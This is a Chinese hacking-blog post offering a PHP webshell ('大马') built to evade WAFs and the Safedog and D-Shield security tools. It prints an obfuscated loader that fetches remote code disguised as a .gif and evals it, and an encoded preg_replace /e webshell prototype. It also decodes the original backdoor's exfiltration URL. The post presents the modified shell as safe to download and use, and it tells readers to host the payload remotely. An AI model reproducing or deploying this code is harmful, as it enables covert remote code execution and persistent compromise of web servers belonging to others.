PHPINFO为广大热爱网络技术的朋友无私的提供最新网络教程、网络工具、网络攻防、BUG漏洞,在这里能学到更好的网络技术技巧与经验!致力于安全研究 程序开发!
文章59 浏览73944

过各类主流WAF的PHP大马!原型之去后门

【摘要】 过狗过D盾更新: <?php set_time_limit(666); $i = array("cms","chr","http://","www.phpsec.cc/Hac...

过狗过D盾更新:

<?php
set_time_limit(666);
$i = array("cms","chr","http://","www.phpsec.cc/Hack","/bypasswaf.gif");
s($i[1],$i[2].$i[3].$i[4]);
session_start();
function s($c,$url){
if(empty($_SESSION['PhpCode'])){
	$_SESSION['PhpCode']=file_get_contents($url);
	m($_SESSION['PhpCode'],$c);
	}		
}
function m($a,$c){
	$unzip=$c(103).$c(122).$c(105).$c(110);
	$unzip.=$c(102).$c(108).$c(97).$c(116).$c(101);
	$ss = "";
	l($unzip($a),$ss);
}
function l($xx,$ss){
	$password = "admin";
	$MyName   = "Admin";
	@eval($xx.$ss);
}
?>




今天t00ls有位朋友说他的网站根目录出现了疑似木马,但是他自己服务器是阿里云的,又装了安全狗,域名还是走云检测的,这个马竟然还能上传上来并且使用,咋一看,这枚大马很面熟,其实真的是有点面熟哦,然后就手痒开始解剖了一番,发现尽然还是带了后门的:


大马唯一好处:过各类主流WAF,云WAF!可以自行测试。毕竟现在一句话不是万能的了,加速乐这类根本没办法连接得上菜刀了,大马其实也还是是渗透测试中的利器。


大马原型:

4556.png

代码如下:


<?php
error_reporting(E_ERROR | E_PARSE);
@set_time_limit(0);
@ini_set('display_errors','Off');
@ini_set('max_execution_time',20000);
@ini_set('memory_limit','256M');
header("content-Type: text/html; charset=gb2312");
$password = "admin";
define('VERSION','websafe');
$liner = "pr"."e"."g_"."re"."p"."l"."ace";
$liner("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'
eJztvWt3I8eRKPhZPsf/oQzT————此处省略很多很多的加密的代码————U'\x29\x29\x29\x3B",".");
?>
解密出来的于样子:


vvv.png

然后就翻了翻看有没有什么后门之类的,一搜password就原形毕露了:

sda.png

后门地址:

$copyurl = urldecode(base64_decode('aHR0cDovLyU3MSU3OSU3NiU2MyUyZSU2MyU2ZiU2ZC8lNzAlNjglNzAvP3U9'));

这段就是先利用urlencode加密然后再用base64_encode加密,解密出来的地址是http://qyvc.com/php/?u%E2%80%8B、一查域名发现就是后门zjjv的老屋!

123456.png

接着就是去后门之后的各种自己的思路进行加密过狗过盾了,用法跟前面发的一个大马加密思路一样。完璧归赵。

我这会附上大马的原型以及自己加密之后版本分享给大家,另外加密的图片远程调用的大家可以自己放到自己服务器上面进行远程调用,以免我这边的删掉了大马就失效了!


后门都已经去除,大家放心使用!


打包下载:


bypasswaf.zip大小:22KB | 来源:WWW.PHPINFO.CC
已经过安全软件检测无毒,请您放心下载。

相关推荐:

发表评论

游客 表情
看不清楚?点图切换 送你一朵小花花~

众说纷纭(0)